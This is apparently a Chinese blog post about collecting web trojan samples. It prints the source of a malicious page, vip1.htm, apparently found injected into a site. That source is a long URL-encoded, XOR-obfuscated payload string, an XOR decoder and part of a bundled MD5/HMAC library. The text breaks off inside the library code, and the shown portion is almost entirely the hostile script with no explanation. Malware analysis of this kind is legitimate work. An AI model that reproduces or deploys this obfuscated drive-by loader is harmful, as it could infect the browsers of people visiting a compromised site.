Web木马样本获取的简单流程

真够狠的啊，一下加入了8个，随便那一个看看了，就第一个吧，vip1.htm，源码如下：
复制内容到剪贴板代码:
<script>
strHTML="";
strHTML+="%0BJP%17XG%12%14%16F%05%0DZF@%15%02J%1DR%16%16Q%11Y%5B%01RK%05%0AITJ%1";
strHTML+="C%06%1F%5D%15%0AY%1B%15S@%5BD%11%06%12EFK%5BG%16WC%13%17%06%08il%0BW%5";
strHTML+="C%16RE%0FD%11%0AF%3D8%0E%5D%03J%04_TEK@%01%0F%18%5C%05J%0F%02%14VTV%5B";
strHTML+="%11%3Al%08JZ%09CQ@%5D%15L%5B%3F%3BYKQ%10%5BB%16%19%09%07%0A%01BXT%00%0";
strHTML+="C%15%2CU%13U5S@%5BD%11%1A%5B%3F%3BY%19%1FO%3F8%06V%06%13%09%03YM%1D%12";
strHTML+="C%5E%12Q%09ZN%12%0EAW%17Q%15F%0F%13Y@BQG%16%5C%14%17H%05BMV%14@%05J%5D";
strHTML+="%01%18%0FT%00%1E%5D%01%0BI%5BUQ%14%5B%06J%1E%06R%5E%05%11%12RHBXm%15%0";
strHTML+="E@%11D%5C%1F%1DEC%12%16%0EX%00%5D%00%0ALQ%5D%0F%16%5DH%01%1ERe%11%5ERB";
strHTML+="%12Q%14ET%0Dn%10hT%08Vn%06Wd%03Q%06nS%0AQ%3AUT%04e%02W%01kW%05RhW%01%0";
strHTML+="5n%05T%099%03%03Vd%03P%04nW%0F9WTSk%08%00Um%06V%019%16%5DYV%0FhG%5B%09";
strHTML+="SB%16QV%3E%10%09%0B%5DW%5B8DTU@%0CU%0D%3A%16%5E%5D%02%03%0Fn%16%27%7C%";
strHTML+="5C%04rP%0D%04O%04%07%23%0AHWU%22%07e%11%5EXSR%099%16K%09%0A%01uH%08Uq%";
strHTML+="01Q%7EqP%0BwQ%0F9D_%0FSA%0E%0CU%05M%5D%01%07MYV%06%0F%01SXn%13%0AHW%0C";
strHTML+="n%10YM%17%1F%1F%10VK%13%04UX%5B%1C%01%5B%05E_WZ%11%16%06@T%04LW%27%5EW";
strHTML+="%0F%5C%0B%12L%3A%15VQ%0FTT%12hG%1DO%0BDSFE%5CX%03%0A%04%5C%5DLAW%16x%1";
strHTML+="1%12%16%0FULG%00%19%5E%02%18%0CP%1E%19%09DU%17%18%06ZX%09Y__%03%09%14X";
strHTML+="%17F%07%13C%5CB%14RY%5BU%01%5BHs@WU%11%5D*P%5B%00%5BFJn%10\/P%06%14%0B%";
strHTML+="15X_GKIZ%0A%7C1%606l%10%1EhGdG%1B%0A%13Y@BT%0FS%02%13%07%16FTLG%00@FU%";
strHTML+="099%16%27T%5Dn%16%5EN%04@%11%06MF%07CCV%049D%00%04%19jG9%13%0C%10U%17%";
strHTML+="14%05EFWE%14%0DXn%13%17%5DS%0Fn%10YO%04%14D%01%0A%08%08%13PEFC%12C%05E";
strHTML+="FWE%14%5B%0B%0FP%01W%1C%01@W%03M%00%09%06%0CRZGMRB%12Q%14EU%1BQG@%00I%";
strHTML+="14%06%1A%06MF%07CCW%159D8D%1E%02E%04C%17%0E%09T%0F%05EFWE%14%5B%0B%1C%";
strHTML+="7E%15%5D%5CJn%10%25%7C1%3AFJTLG%00@FJ%04L%0F%05EFWE%14%5B%0B%1Cb%00VVJ";
strHTML+="%1B%09%15N%12%05%11%12RHB%06_%19%12M%15Q%5B%01%09DU%17%18%0B%0F%00%5EO";
strHTML+="E%15QG%16%5C%14%17%07%08%19VC%00_%1FO%0F%12C%11SGFQ%14I%06%5C%1F%12J%5";
strHTML+="B%16W%1A%01L%11%03%15%17TW%1D%17TD%16%5B%0BG%03r%5DVML%03%12EF%06MF%07";
strHTML+="CC%01WK%15%05%10RM%5C%03X%5B%03%1C%06A%12UCC%06I%0AL%09F%12OQ%17FW%13H";
strHTML+="%06%08J%05%5BV@%00%19%1E%5DB%04FFSGFQ%14I%06%5CBXYV%0D%1CQ%10%5C%04%12";
strHTML+="%01%09USV%06E%1F%3A%166%5C%03%5C%7E%1Cu%15H%09%5BR%04L%5B%0D%5Cn@%159D";
strHTML+="8D%1E%02P%10ER%17E%06Z%15%1EazQ%29t%00jT%06mF%07%1AQ%17M%00%17%15T%1Be";
strHTML+="%119%13%1B%3A%169%16JTY%1E%04L%03%18QP%11%5BZJQZ%0BU%04%0BM%1DJ%02%0FJ";
strHTML+="BT%14%5D%15@%3A%0E%10%1B%0Fh2J%1D%1CH%06%3Fh%0E%1D%11Z%17%0F%14%12%094";
strHTML+="9YBT%14%5D%15@FDKBQX%1A%11WI%11%17X%11Q@%0BI%11DZ%00BWP%11XX%08%14%0CZ";
strHTML+="%0FD%1A%1B%14%1E%18%01%5DR%10UW%0CF%1C%15K%0C%12%01N%15%1B%1A%5EL@%0FZ";
strHTML+="%01%5B%11%1E%5D%5CX%0AY%01%12%0CEQ%5C%0BF%09%5E%16%16%05%16%0FGM%0Dh%3";
strHTML+="B%0B%04%5B%01MF_%5CQ%5B%0BL%00JE%08%5D%5C%17%0F%10%10%5C%11%13%16%08%1";
strHTML+="7_R%09BRD%14%0AZ%15U%5EWW%11K%11SC%11%05%10%10WF%17K%0BF%02%07%5BJVG%1";
strHTML+="1X%08P%17U%01CFSF%11%05G@T%11M@%0C%12T%03U%16%03FX";
function XOR(strV,strPass){
var intPassLength=strPass.length;
var re="";

for(var i=0;i<strV.length;i++){
re+=String.fromCharCode(strV.charCodeAt(i)^strPass.charCodeAt(i%intPassLength));
}
return(re);
}
var STR =
{
  hexcase : 0, /* hex output format. 0 - lowercase; 1 - uppercase */
  b64pad : "", /* base-64 pad character. "=" for strict RFC compliance */
  chrsz : 8, /* bits per input character. 8 - ASCII; 16 - Unicode */
  
  b64_hmac_md5:
    function(key, data) { return binl2b64(core_hmac_md5(key, data)); },
    
  b64_md5:
    function(s){ return binl2b64(core_md5(str2binl(s), s.length * this.chrsz));},
    
  binl2b64:
    function(binarray){
     var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
     var str = "";
     for(var i = 0; i < binarray.length * 4; i += 3)
     {
     var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
     | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
     | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
     for(var j = 0; j < 4; j++)
     {
     if(i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
     else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
     }
     }
     return str;
    },
    
  binl2hex:
    function(binarray){
     var hex_tab = this.hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
     var str = "";
     for(var i = 0; i < binarray.length * 4; i++)
     {
     str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
     hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
     }
     return str;
    },
  
  binl2str:
    function(bin){
     var str = "";
     var mask = (1 << this.chrsz) - 1;
     for(var i = 0; i < bin.length * 32; i += this.chrsz)
     str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
     return str;
    },
    
  bit_rol:
    function(num, cnt){return (num << cnt) | (num >>> (32 - cnt));},
    
  core_hmac_md5:
    function(key, data){
     var bkey = str2binl(key);
     if(bkey.length > 16) bkey = core_md5(bkey, key.length * this.chrsz);
    
     var ipad = Array(16), opad = Array(16);
     for(var i = 0; i < 16; i++)
     {
     ipad[i] = bkey[i] ^ 0x36363636;
     opad[i] = bkey[i] ^ 0x5C5C5C5C;
     }
    
     var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * this.chrsz);
     return core_md5(opad.concat(hash), 512 + 128);
    },